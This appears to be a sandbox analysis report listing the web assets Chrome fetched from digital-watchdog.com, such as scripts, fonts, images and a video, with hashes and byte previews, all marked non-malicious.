                                                                                                                                                                                    File Type:ISO Media, MP4 v2 [ISO 14496-14]
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):131072
                                                                                                                                                                                    Entropy (8bit):5.6942048454300025
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                    MD5:4FDD07372CCF4CD31E91B4D5E141B415
                                                                                                                                                                                    SHA1:10D5AFD4AB1EE0436271CB8A69C83A1161D5AAA8
                                                                                                                                                                                    SHA-256:5159AC7EE53F7E12004CEF81301C225479F01933BAA09204075D48FF5AF59076
                                                                                                                                                                                    SHA-512:EB5BFA4C0CED126D5664BB0E669003FB0DB19F39199BA6B2F9E86C29D0794AF9A7BD74CDE6805A2A0C54494D0EBA6F12DF069C0AC6B080B8D2BC23296ADC073E
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                    URL:https://dmq883log67hn.cloudfront.net/assets/img/banner/DW_SiteWatch_HPBanner_with_video.mp4:2f94f19b591284:0
                                                                                                                                                                                    Preview:....ftypmp42....mp42mp41....moov...lmvhd.......E...E.._.....................................................@...................................trak...\tkhd.......E...E...........M................................................@........J.....$edts....elst...........M...........@mdia... mdhd.......E...E..u0..No.......@hdlr........vide.............Mainconcept Video Media Handler....minf....vmhd...............3hdlr........alis............Alias Data Handler....$dinf....dref............url .......estbl....stsd............avc1...........................J.H...H.........AVC Coding............................,avcC.M@)....gM@)...A...D............h.<.....stts...................(stsc...................................pstsz..................?q..JR......W2..X...R7..QD...........&......ba...#...........S...................8...[...........Y..........1.......(...u...v...x.......xs..{...............,.......................*........6...7...............Q.......!...w..............8....G..~....;..(........
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:gzip compressed data, max compression, original size modulo 2^32 1589
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):1000
                                                                                                                                                                                    Entropy (8bit):7.80557994286543
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                    MD5:D619DEE97E8F171F01D707AD0C827863
                                                                                                                                                                                    SHA1:EFAE1CF6B8ADCBF6E10F7C077F8426781733950C
                                                                                                                                                                                    SHA-256:3D7B403EED798B485AE68F7C507C9EA8E328397CCBF9CDFCAF6DFD33AD04674B
                                                                                                                                                                                    SHA-512:1619A553F99C1B1FA183F6B3678BAF444AF9327611A1FA02C6B24229FA754999B37D0D2AA508B05E93BCDD7627BEDB418247D9DB349A79B3A56941CAEC866ECE
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                    URL:https://www.google.com/recaptcha/api.js
                                                                                                                                                                                    Preview:..........tT.r.8.......b...R~ .!....(J...#.vL.o.B.ff.B%u..#u.q.G..i.F..C/..S.^...u.R..h.H..[#.=4..\..(.....#D<..C..e.^.-N0.%.......E....a..?>.]]9..j......K..Z\....~.........K.BY...~.\.....0..j......|...-./...(.,.,.h.y.o\.p.R=rpB..O4........_...F...P....D.._y.o.0\....;.w..I...-.Q..C...G^......2$.9........Y....4\..2....%..g..}.+........x..)>.L.... RW.i^.....FQ.XH2...d.D..iI..o.......+...*..J..J...Z..gsWi....O..r.4ov...+..g."..c....*x.L.8_zzx.U^.w...../.._J.6.....X.V.OH....R.RvzN......X.).%#......4'..x'{.A.9n...p.a.{.$..f]{...co8...y2..7...(N.g4.......D.bfGh.nm.{w7)..V.{.E.z..na...../..n..va1......./~...!..c:u..+U...t.ec..y ~2...:hC\...x4..)r..Q5i.z.=.AR......%.[....N.a,..I.8s.8...lP...>H*.\?.O\A..q....]!..7.r..$..m.m..^MH!...=..`.c.]....0..3!z.A.A...........uE.t[....`.d..X.....}...[....u..,..X.p...o...b.vp.....Z 0.o......A.'.-.....f.N...Y*.K"p.t.&A..P}...I....../.,..&..8!....}<FV.y.,.e~U....K'.. .|A..'&.$.lJ@.5.V........w..5...
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:Zstandard compressed data (v0.8+), Dictionary ID: None
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):115012
                                                                                                                                                                                    Entropy (8bit):7.994346936204915
                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                    MD5:59C5A0193B002C869EB1B77521875BAD
                                                                                                                                                                                    SHA1:8A99D42BCCEDCE0038536F1A0515B54F61669DF0
                                                                                                                                                                                    SHA-256:552F46908643A3354711482E1BE52D377D983199B734E622672C3F5407094E68
                                                                                                                                                                                    SHA-512:191CB7D1FDDEBAF847A9A6D933C850ACC252B44E1D09ED1569CD5257E6EBE8ACFB20544F36AD763202A7956DB899C0DEBE9B05A1732AD9E7E881A42B235FC3D2
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                    URL:https://www.googletagmanager.com/gtag/js?id=AW-456244667&cx=c&gtm=457e55s2za200&tag_exp=101509157~103116026~103130498~103130500~103200004~103233427~103252644~103252646~103351869~103351871~104481633~104481635~104559073~104559075
                                                                                                                                                                                    Preview:(./..S......N..T.1.D..6P........{......,...Q..H^..G..{.?4......H.@U......h..dn<./.&y.^....ju..k..b..1...-.uF.L^200:.....j....Ho%@...n.,+...U......U...jq....".7..Z5.GX[d.VL5Q....F].....j[6......)j.Ldi.z"B..:.R...(.jLbs.y.ILt J_....`I..G...9K..5 ......f'I..O3T.......q.2.x.~g.9p5..I.tfa......RT5...P.3..A8H.8. ...{^v;H......v............j.].a.+...,..l..h.\/.Jc.R..$.U.[2...h;...!3qR.d..[..I...l..m..mc.7K.....=...d86h6....s.3..W...~.......R...s...z..........5-.h..c0@..Wit....5.6.k<KKx.8.k....p]..,.}Z../\n+.u-k..,..1.Xg..h..}+S....5....L.#M...v.H...a....LQZ...N.-C43..T1.........g.F..g..~f.4.>+vk..`..y.......Ske~<..a......f...X.....u.LZ....c.m5E..9....5.-.Y.../..-._...{Ar...8...."A..L...o.|.B...E....m-[..l....e.....U_........u8k.g...3Em[...Q..\..`.........T..l..${Y.m..EY.<.......F....k......-EY...,.1B...@z.]..1FQ.u......DC......h..(....(p..F......y.#...jM".DA..........((t...%Wa...U.1..5.`.=.}..wR..w.-.1..*.:.*.i.].R'....<u...-.iR.f.8.E.xQ...i..2.@...9......H
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):5537
                                                                                                                                                                                    Entropy (8bit):5.063234972247136
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                    MD5:CEC06F7EE4F75575AD099633D2FB2C0B
                                                                                                                                                                                    SHA1:DA627133E99A25332657ADF56365E74AC7F0E9CF
                                                                                                                                                                                    SHA-256:34905A17ED66C14560B65A278763287B883A44F8BEF045C19373FB264B53CBF3
                                                                                                                                                                                    SHA-512:2356E436034AA4139A522CE2DB8B9ABC96DB8B415868CB19F343D1FEFF41B83D5CA8D13FA9DB2401917AE70FED503C59F994A65BF0D6B2DA5D27AF99D553988C
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                    URL:https://digital-watchdog.com/css/bootstrap-datepicker.css?20250530073516
                                                                                                                                                                                    Preview:/*!.. * Datepicker for Bootstrap.. *.. * Copyright 2012 Stefan Petre.. * Licensed under the Apache License v2.0.. * http://www.apache.org/licenses/LICENSE-2.0.. *.. */...datepicker {.. top: 0;.. left: 0;.. padding: 4px;.. margin-top: 1px;.. -webkit-border-radius: 4px;.. -moz-border-radius: 4px;.. border-radius: 4px;.. /*.dow {.. border-top: 1px solid #ddd !important;.. }*/....}...datepicker:before {.. content: '';.. display: inline-block;.. border-left: 7px solid transparent;.. border-right: 7px solid transparent;.. border-bottom: 7px solid #ccc;.. border-bottom-color: rgba(0, 0, 0, 0.2);.. position: absolute;.. top: -7px;.. left: 6px;..}...datepicker:after {.. content: '';.. display: inline-block;.. border-left: 6px solid transparent;.. border-right: 6px solid transparent;.. border-bottom: 6px solid #ffffff;.. position: absolute;.. top: -6px;.. left: 7px;..}...datepicker > div {.. display: none;..}...datepicker table {.. width: 100%;.. margin: 0;..}...d
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 72x72, components 3
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):5023
                                                                                                                                                                                    Entropy (8bit):7.751070196157189
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                    MD5:876C3F28DB0ABF5AEF233E7A4B47DDD0
                                                                                                                                                                                    SHA1:617484C80FBAB87079288221357EB50856F1C1B7
                                                                                                                                                                                    SHA-256:D29C48255FC70AB35E088B5A85901BF532A2167EDDB80F09E1458F089A09B3AE
                                                                                                                                                                                    SHA-512:EC502A498037A0D79349B96AF8253ABFED7A5582C8A90AEC1EF13A6CD73EEFD1FB3737430319FF93E3DD8AF93C185C515180043829FBC152D7327F23263C9117
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                    Preview:......Exif..II*.................Ducky.......d......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c006 79.dabacbb, 2021/04/14-00:39:44 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmpMM:OriginalDocumentID="uuid:9E3E5C9A8C81DB118734DB58FDDE4BA7" xmpMM:DocumentID="xmp.did:7365E322477211ECB8BDB3060B8AFEEC" xmpMM:InstanceID="xmp.iid:7365E321477211ECB8BDB3060B8AFEEC" xmp:CreatorTool="Adobe Illustrator 24.3 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:0e7e163f-387d-5640-8525-967c941de0a4" stRef:documentID="adobe:docid:photoshop:4426e061-dcdc-aa44-9118-671f329bebaa"/> <dc:title> <rdf:Alt> <rdf:li xml:lang="x-default">DW_HomePage_JC</r
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:data
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):1482
                                                                                                                                                                                    Entropy (8bit):7.868468336295064
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                    MD5:B4E49E4B5F00BEECEF5DF4D9546C7926
                                                                                                                                                                                    SHA1:0293DB096BAC3C12E4BB33C261E7719403C224CB
                                                                                                                                                                                    SHA-256:03639044D68ABD5B6D0FC32FD62BDF349295CA389E66FF46079BCFB56E00A9D7
                                                                                                                                                                                    SHA-512:754C1C570C53D62C39C57AC3B5516FB0EFE597C3CC49510F99F9846E80AEEEE91E59A44BAB694C4FCDFF272C7CFBB1052A3FA0BB535E9CE4F5C3C142D30DBE2D
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                    URL:https://www.googletagmanager.com/static/service_worker/55j0/sw_iframe.html?origin=https%3A%2F%2Fdigital-watchdog.com
                                                                                                                                                                                    Preview:..n..8pN}...z]..:......y...lO.;.....1..!bf.sZI..3...i0.Oi...m!$KTxn.0..Om...S...\.I./ ....#9.,...5........{.MA..M.3v7...)....f..m3.:X.a..........w.Y6U..&....._"aHs"..$..zir.....p%c..Y.k...<!+_....... ..p...%........2E~^.S."R.....!.....%....2..{=....[.a.yz.w..].Y......E7..$.:.Y....1..|.o..g,:.(..YZ/. .....1.E...h.).&.u..L..8.R.........P(\na.g..IQ.J:...a......#.3iC.(...pk....SH./....:.I.l~..._.D]..5.g.1.?...|..tw...8...'....i...y%U..{.;....+w(E....F.n47.._..Y+K.@..<3..!.....|f.R..<.iH...............`t....4d.=..nWr%B...X.*R4.c...*H.....~`......e&F.. ..t.."...3..*.^.P.D...JT.*.'..v.n..v....;..Si.e.zB......dV.0...E....A.....i.k..a_J|.!.gr..N.,.?.a`_W].Q..|..z..9...J...'..._kj..[..!).u...m.?f.r..N;.....O...tY.0........m{%.......>./LW/..1.GZ3^`..+A..C....D.fx^.k....f.M.N.....F.,P@@....<..D..q.V..)lA&).A!..L1.2...C..@0Kd....'.n&}.j.....NE..............|&..=..x....x&m8.\WX.|..b...dsYUT.m..@.|..u.C..%Q.....D>.r...........zA.|{......A.-..c.p<.f/E..I.b
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:data
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):29976
                                                                                                                                                                                    Entropy (8bit):7.991810099531193
                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                    MD5:4F5C8310E484F5414D7C432C3F4DC126
                                                                                                                                                                                    SHA1:EE89424A4A7CC071BE1D5ACA7D91005ADD36FD97
                                                                                                                                                                                    SHA-256:125A8DCF8E4E60316F47D07004044141F7D7C0AB7CDA9670AA2243016564C75B
                                                                                                                                                                                    SHA-512:C1623262A1BAEE9EDFD7414A379048E2932BD9646FB2BD5DF55A47EF7D8B093EEC3BC33C8C2CFC0BB892E4C5073F9C265E9509A1C84AAC4D2CC3ADC4C8E900CA
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                    URL:https://www.clarity.ms/s/0.8.9/clarity.js
                                                                                                                                                                                    Preview:..?..........p..1PM..0.%2R=$l"#"+.2....H+...3qw.0W.TUs.Ow...i.>.y.....z%.6.N.{..$?XPP.P.Pq..)5......<.g.>V.9\.M_IBj....ze........J....-Bh.<8..h_......t..Y8.........x......{w./.oo.2hk...S.....&+.z.o_~R..#.M|...8...4m].BOU..[G.u.w.:.S..)p...|.....^..nlEuf......]......2...a.........S..>.Oy.5.L........?..F9......GK...O......%Y.........r8,|._}..,....R...7.S.H..w.u....G.WK.^..w...Y.#j9..N..|x.-......J.Uw..M...-h..&..m3w..VF..P..j. .W.......m.?....t..K.}pz>'.3-.....5..+.._k;.i.".7G..n.<...3...L.#....P......vY.a.2.M.%;.....d.j._.k^g....&.wTS..........i....j...W.5..9'..u......Q.S...D.Z...^...YQm...~.p"`.=kzX....t-n.g.>.....j..)..&e.^.....q..r/.R.:....md^.R....|...\[.3..j..}.T[UF\...2..5.....6.U.x.X...S..&&.V...+......~.l.5%ID...y.....).i.R........J..f..Tv......=?.......L3..|f...s....\Q=&.......z.".(..M[.bR..T..q.K...lN.,ey/.r3...........4....q..6...H...Y.,...Va./....w....7.^@"F".B....x.}.........6.......(...Rp.@c2..!....b..8.[=...:>
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:Web Open Font Format (Version 2), TrueType, length 18124, version 1.0
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):18124
                                                                                                                                                                                    Entropy (8bit):7.987960709769048
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                    MD5:0D3827BFCB025F7A5F240ED93D04BF25
                                                                                                                                                                                    SHA1:A026D690A1EB39D9B8AADCE378F7B80CD4D9DAB8
                                                                                                                                                                                    SHA-256:41AE966C9E847E1599D07E24AB47B582AE08BE7409C48EC4F6D7B3451A6E13DD
                                                                                                                                                                                    SHA-512:2EFF974E81BE4A1E79A10D001C7FEAB4BCEA72D84E005A508822509EA21A54CF2ECEB0F8963A4F5C097FE473FC3873D7EC321B84459CFB19B0C55A1DEE5AD818
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                    URL:https://fonts.gstatic.com/s/dmsans/v15/rP2Yp2ywxg089UriI5-g4vlH9VoD8Cmcqbu6-K6h9Q.woff2
                                                                                                                                                                                    Preview:wOF2......F........h..F\..........................w.....v?HVAR.u.`?STAT.\'2..</l....D....0.0..j.6.$..\. .....;...#.5.....*...;.D.v@.*f.H..q..m....$.24..H)S..A..^dJ.L1U....XDU1$DFH..4._"...(.LC...U...r.a:...([....Eo......7.2..........to^.....f....u...<7..^./...N..Xp@.y........?..O_kwps.1......y~N...B.G.@.b."..8..^J....F.....N)u..............S.?......|<....}......R!D....'J...?....$HC....I H.I.*.....y.....;Y...jD...9.{ ....g.w>.w.n{.......|..8Hm..(K.[......V.4o.}...r..J)PM!.`1..1B...EPe....8...'...."..4....6..'.... 8.d....Z....t..q|!F...1f.>`..Bb..p.%I`..t...<?....D.Hi."z....Y.g.......f?.x...,.~......2j@t....@...C.%...y..t.q!..2..Re.".|l.N...7..-...7.l.....1.T...w..<..........\b..I.a.%...^ .F.R7......A.R"/..I....%/.Y..9V9V!...!.j........m.1...~..{.!..(...j..?~.j.../.."%....i{..;..f..|.......fi..*..M...8.AyP._....7..h..b.."G.~...7..0.d.Yd.Z.S.......2.5.+xB.k.1t.KT~...........#..k...,.^...`[...0.........v..3.....jL.1kk.m...(<.Gnd.....S...TA..
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:PNG image data, 883 x 676, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):468590
                                                                                                                                                                                    Entropy (8bit):7.993991266218709
                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                    MD5:64CD6D4140F1E2F91FF804D9C68100FD
                                                                                                                                                                                    SHA1:B2ABE1BB7DE22E8F0FEE041DEAE336F60E24BD56
                                                                                                                                                                                    SHA-256:AA348535331904C60C171DF56F50A7E6AFF36795CA7929CFDA475299980EC7A6
                                                                                                                                                                                    SHA-512:AF3DD35099DFF66E59CC4CDD5C969C1BB16875BF511F5411ED056E51C72C89E7DEBE26F227E7D138B3E2E68425088384FA78F8B26FCA1CE658BF74BFEB86A14C
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                    Preview:.PNG........IHDR...s...........fY....gAMA......a....IiCCPsRGB IEC61966-2.1..H..SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D..*.A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m....... ......O.
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:GIF image data, version 89a, 1500 x 1126
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):656473
                                                                                                                                                                                    Entropy (8bit):7.837161544852039
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                    MD5:AF81B81A20BC1F4088FDC797A85CB669
                                                                                                                                                                                    SHA1:E079B9F9728319DAFB86E0F3B14F64436AF06762
                                                                                                                                                                                    SHA-256:BCC690D3E1B2E4937EE440154B4C80281654857F4BA0879B1B326543E8D56815
                                                                                                                                                                                    SHA-512:03B3F93DBD0CA6404A601C00AADD477378714B787E3D5AB5595BF89B332F05F9B28E05FBCC565B577603E4CF3DA942D20C46576E6966F2ED9499D924D0FEFDFB
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                    Preview:GIF89a..f....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................!..NETSCAPE2.0.....!..XMP DataXMP<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c145 79.163499, 2018/08/13-16:40:22 "> <rdf:RDF xmlns:rdf="ht
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=12, height=1688, bps=158, PhotometricIntepretation=RGB, orientation=upper-left, width=2707], progressive, precision 8, 2707x1688, components 3
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):2790556
                                                                                                                                                                                    Entropy (8bit):7.986925528510983
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                    MD5:22630F346F9A9EB51C3345B98DE97DAD
                                                                                                                                                                                    SHA1:F509FEE9BBFB2033C137F276269FD07D0A6AAD7F
                                                                                                                                                                                    SHA-256:15C844D96A16856C85E59802764AB7D499B8B10C8A594216801980CB3D1DE996
                                                                                                                                                                                    SHA-512:351D6729AA97CB1C4EA352608100CC349F4E3E91D8909E132938FBFE142FB1B55E5FD754E09D505DB3522602615C6E4F2A5408CE9EAA05511A37CC9AD653D272
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                    Preview:......Exif..II*.......................................................................................................(...........1...!.......2...........i...........$..............'.......'..Adobe Photoshop 23.4 (Macintosh).2022:07:06 09:41:02..............0231................................................................r...........z...(...............................'.......H.......H.............Adobe_CM......Adobe.d.................................................................................................................................................d...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..P'.A<s.t?.(.F...las........1.n.....A.x.a.05....O.....Id.CY..c. =........
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:gzip compressed data, max compression, from Unix, original size modulo 2^32 86927
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):30288
                                                                                                                                                                                    Entropy (8bit):7.989374364238999
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                    MD5:FA20D8437865646E82DC61B9ADF6C93E
                                                                                                                                                                                    SHA1:936B2B3A3757ECA48867CF43BADEF1C608177A28
                                                                                                                                                                                    SHA-256:777EFEE22CC03118F4E5BA78AEF0CF7ADB1E8A13FC2B5C60FD220E80472F0188
                                                                                                                                                                                    SHA-512:81C77E1A7B29D089EF10056C10AAC8F696CC889499D9B68B40550E861173557EDAF39049859188FE9EEC55F69B3B22B05044AFD8B6B212101EC792A7FD289F02
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                    URL:https://code.jquery.com/jquery-3.3.1.min.js?20250530073516
                                                                                                                                                                                    Preview:............y{.F./...)D....-Jr&.w@..8^.gs&v.C1y .I!.....D.|.[......3s.}3c.K.......q.....Uqwp........ .F._.=x...YR.yv.d....T..4.".XWyQR.......X./..Ju...........JT.}...%}6..a._...B..n....U>[/.....u....5o......Je..fz'Q\....W....".9......00c....P.Arp.f3*s.V.tg...a..u..P+.6.a@3..i.fA.vW.?.?qu...i.N..L.'..F"R..'a.P.wE^...\.2...`.....4.DI..uy).tA..[*...[1..A.........eR....*.;.....L...d..u..D..i;..B...>.W.....W......d.L....... [/.T..T.@..V\.{...NDYL.......v...,..<.4?a%.....B%.z.T..0(.E..*.@.J.VR.ws... ....l.N...~$..a5.T.l..V*.=.L..0...........u._+.f.zu....(...~..;..6...T..x..CE.*b>...-.{!.....M..M.........7[.N..:>/..^.zu~..d...../..L..V.....m.`.@x=........e|"..YQ$w..t...x......m.,.p..NF...>~...I..M.....J...Ub.*..*....x..#..-M.U...%..j+T2......o.B.b+..UW1n..,.~$.....pMqeF,2,SD..>..V.9.sy..N..#.......U...O..2y...).Q.t...".}..y..zR.........y..$.OP}6.;J.*.....KQ.A..b..Q.x../....6$..s..0... .B..M.......R..nu...w:.....|..o.'.H.2iTV....H...d.Y.I..
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:PNG image data, 567 x 567, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):11684
                                                                                                                                                                                    Entropy (8bit):7.861025012248726
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                    MD5:CA93CC168242A2C4BE2EA4070B8FCEC5
                                                                                                                                                                                    SHA1:003A500E6D1022BFF9BAC5B4493D28C96B0E816C
                                                                                                                                                                                    SHA-256:B8AA450791A6D3AA45DADED76938A21DBABE5CDE444AA022133FC5D82F73AC56
                                                                                                                                                                                    SHA-512:D14467C31F9E0C8427CD9D517076AB3A0FE06E3BE3E87C874F489AAF0D03E094778C303E837755CA2AB156F8E7152BFC39E60FEFBEAC983C9C6B034515EF5CD4
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                    Preview:.PNG........IHDR...7...7.....g(z.....tEXtSoftware.Adobe ImageReadyq.e<...%iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c148 79.164036, 2019/08/13-01:06:57 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 21.0 (Macintosh)" xmpMM:InstanceID="xmp.iid:89AA79E8501811EDA3C588EE09F49F97" xmpMM:DocumentID="xmp.did:89AA79E9501811EDA3C588EE09F49F97"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:89AA79E6501811EDA3C588EE09F49F97" stRef:documentID="xmp.did:89AA79E7501811EDA3C588EE09F49F97"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.Ic...*.IDATx...O..g......".a$.M. .....p...8.......Bck...R.iA...H9.'Z$..8.h.u.[.!..).2...7.. &.....v......y>...
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:data
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):6938
                                                                                                                                                                                    Entropy (8bit):7.973402951542649
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                    MD5:50BB866F1FA3D49499C3D8FCCD281B8B
                                                                                                                                                                                    SHA1:CA64653ED6FD65F3B55BC85F56CE74DF04E651E9
                                                                                                                                                                                    SHA-256:621AB0D1E80EC5554F53CACC351CBD21E1CC8BF43A84712955E494B63F0A36A1
                                                                                                                                                                                    SHA-512:73A0315DCA1002F1A122306E17EB8249E95ECA691B7260C52E6DFBEE10094F0502C100AB5A280871C5B378CE55A0A9DBB31B6F73E742EA89F8C8615D0099D582
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                    URL:https://www.googletagmanager.com/static/service_worker/55j0/sw.js?origin=https%3A%2F%2Fdigital-watchdog.com
